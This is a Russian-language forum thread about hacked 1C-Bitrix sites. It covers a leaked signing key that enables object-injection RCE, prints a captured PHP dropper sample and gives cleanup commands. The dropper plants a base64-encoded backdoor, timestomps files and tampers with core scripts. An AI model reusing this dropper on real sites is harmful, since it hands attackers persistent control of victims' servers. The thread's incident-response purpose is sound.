Форум

Если вас ломали ранее и вы не сменили ключ подписи данных  "signer_default_key" в базе данных, то независимо от того какое у вас  ядро, старое или самое последнее, вычищали систему или накатили с нуля,  вас могут ломать используя его. Так как система безопасности движка  полагается на этот ключ при работе в "тонких местах" и не предполагает  наличия этого ключа у взломщика.

В PDF документе "Уязвимости и  атаки на CMS Bitrix", есть раздел "Методы атак", а в частности "RCE via  PHP Object Injection ( signer_default_key )" где подробно описывается один из возможных вариантов  использования этого ключа. Сколько других вариантов ещё существует и  используется, предположить невозможно. По логам это отследить будет трудно,  так как запросы могут приходить на любой эндпоинт, или через $_COOKIE.  Именно поэтому, "signer_default_key" нужно менять в обязательном  порядке.

Он находится в таблице b_option.

Добрый день.
Может где-то писали уже.
Вариант внедрений.
Папка /bitrix/tools/vote/ создается что-то вроде script-8.php с содержимым

<?php
@mkdir($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/vote");
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php", base64_decode("PD8KJHZsID0gJ2tlJy4neSc7CmlmKCRfUE9TVFsnYnh1X2luZm8nXVsncGFja2FnZUluZGV4J109PT0ncEluZGV4MTAxJyYmJF9QT1NUWyR2bF0hPT0nZ2FkZjRlNTdlJyl7CiAgICBkaWUoImhhY2sgYXR0ZW1wdCIpOwp9CnJlcXVpcmVfb25jZSgkX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdLiIvYml0cml4L2FkbWluL2ZpbGVtYW5faHRtbF9lZGl0b3JfYWN0aW9uLnBocCIpOwo/Pg=="));
touch($_SERVER["DOCUMENT_ROOT"]."/bitrix/tools/html_editor_action.php",filemtime($_SERVER["DOCUMENT_ROOT"]."/bitrix/index.php"));
unlink ($_SERVER["DOCUMENT_ROOT"]."/bitrix/components/bitrix/main.file.input/main.php");
   $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js");
   if(strpos($buf, "s=document")>0) {
       $buf = preg_replace("!(s=document.*?appendChild\(s\));!ism", "", $buf);
       file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/js/main/core/core.js", $buf);
   };

   $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php");
   if(strpos($buf, "echo ")>0) {
       $buf = preg_replace("!(echo.*?script>\";)!ism", "", $buf);
       file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog.php", $buf);
   };

   $buf = file_get_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php");
   if(strpos($buf, "spell_word")>0) {            
       $buf = preg_replace("!HTTP_S'] == \".*?\"!ism", "HTTP_S'] == \"g308bad51\"", $buf);        
       file_put_contents($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/fileman/classes/general/html_editor.php", $buf);
   };
echo (240222); unlink ("script-8.php");

Всем привет!

Если у кого осталась проблема с постоянной заменой .htaccess и корневого index.php, то можно попробовать следующее:

• Код
  ps aux | grep "php"

  
  Вводим в ssh-консоли данную команду, и находим постоянно работающий процесс и запоминаем ID процесса, например, ID равен 22233. О процессах указывалось ранее на форуме, спасибо за подсказку!
  В моем случае файл назывался lock666.php и больше постоянно работающих процессов не было, другие варианты файла могут быть перечислены в измененном .htaccess: <FilesMatch "^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$">...
  
  p.s. Интересно сделано, файл само удаляется, но работает из оперативы, как я понял.
  
• Убиваем данный процесс, зная его ID:
  

  Код
  kill 22233

  
  
• Утилитой, например, через AI-Bolit проверяем файлы и удаляем шеллы;
  
• Иногда тот же AI-Bolit может пропустить скрипты, поэтому дополнительно можно поискать руками наличие в php строк eval(), preg_replace(), gzuncompress(), base64_decode() и удалить шеллы или починить битые файлы. К сожалению в Битрикс таких файлов оооочень много:
  

  Код
  grep -R 'base64_decode(' --include \*.php -o

  
  Еще полезно включить серверные логи и смотреть к каким файлам стучатся боты, чтоб их тоже снести, может какие-то были пропущены утилитой или руками.
  Так же можно посмотреть файлы шеллов и искать по паттернам, которые используются в шеллах, например в коде может встречаться return substr.
  
• Проверяем корневые папки upload, images, css (может еще какие популярные папки) на наличие php-скриптов и удаляем ненужные:
  

  Код
  find . -type f -name "*.php"

  
  
• Обновляем Битрикс, модули и решения;
  
• Проверяем модифицировалось ли ядро Битрикс:
  

  Код
  /bitrix/admin/checklist.php?lang=ru

  
  
• Можно восстановить файлы ядра Битрикс. При открытии ссылки ниже, появится доп. вкладка (12 в ссылке - это текущее число):
  

  Код
  /bitrix/admin/update_system.php?BX_SUPPORT_PROTOCOL12=Y

  
  

p.s. Так же, если в каждой папке у вас .htaccess, то можно снести их все, предварительно сохранив и исправив нужные, и закинув их обратно после удаления, например, корневой .htaccess.
Удаляем командой, через ту же консоль:

В общем, после выполнения данных процедур проблем пока замечено не было. Удачи с починкой!